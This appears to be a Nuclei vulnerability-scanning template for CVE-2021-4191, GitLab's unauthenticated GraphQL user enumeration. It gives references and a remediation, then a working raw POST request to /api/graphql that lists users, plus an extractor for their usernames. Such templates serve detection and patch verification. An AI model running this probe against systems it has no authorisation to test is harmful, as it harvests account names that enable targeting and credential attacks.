62 lines
2.8 KiB
YAML
62 lines
2.8 KiB
YAML
id: CVE-2021-4191
|
|
|
|
info:
|
|
name: GitLab GraphQL API User Enumeration
|
|
author: zsusac
|
|
severity: medium
|
|
description: An unauthenticated remote attacker can leverage this vulnerability to collect registered GitLab usernames, names, and email addresses.
|
|
remediation: |
|
|
Implement rate limiting or CAPTCHA on the GraphQL API to prevent user enumeration.
|
|
reference:
|
|
- https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/
|
|
- https://thehackernews.com/2022/03/new-security-vulnerability-affects.html
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-4191
|
|
- https://gitlab.com/gitlab-org/gitlab/-/issues/343898
|
|
- https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-4191.json
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2021-4191
|
|
cwe-id: CWE-287
|
|
epss-score: 0.16146
|
|
epss-percentile: 0.95369
|
|
cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: gitlab
|
|
product: gitlab
|
|
tags: cve,cve2021,gitlab,api,graphql,enum,unauth
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /api/graphql HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json
|
|
Accept: */*
|
|
Origin: {{RootURL}}
|
|
Referer: {{RootURL}}/-/graphql-explorer
|
|
|
|
{"query":"# Welcome to GraphiQL\n#\n# GraphiQL is an in-browser tool for writing, validating, and\n# testing GraphQL queries.\n#\n# Type queries into this side of the screen, and you will see intelligent\n# typeaheads aware of the current GraphQL type schema and live syntax and\n# validation errors highlighted within the text.\n#\n# GraphQL queries typically start with a \"{\" character. Lines that starts\n# with a # are ignored.\n#\n# An example GraphQL query might look like:\n#\n# {\n# field(arg: \"value\") {\n# subField\n# }\n# }\n#\n# Keyboard shortcuts:\n#\n# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\n#\n# Run Query: Ctrl-Enter (or press the play button above)\n#\n# Auto Complete: Ctrl-Space (or just start typing)\n#\n\n{\n users {\n nodes {\n id\n name\n username\n }\n }\n}","variables":null,"operationName":null}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"data"'
|
|
- '"users"'
|
|
- '"nodes"'
|
|
- '"id"'
|
|
- 'gid://'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
extractors:
|
|
- type: json
|
|
json:
|
|
- '.data.users.nodes[].username'
|
|
# digest: 490a0046304402200d5790c377018b97a73c49886e86a608033366e7853988dea968ff9d640a3c9102205665d6850aa43bf92cfe50f6ad4e370de879105a93a35ca9d1472f416ededda2:922c64590222798bb761d5b6d8e72950 |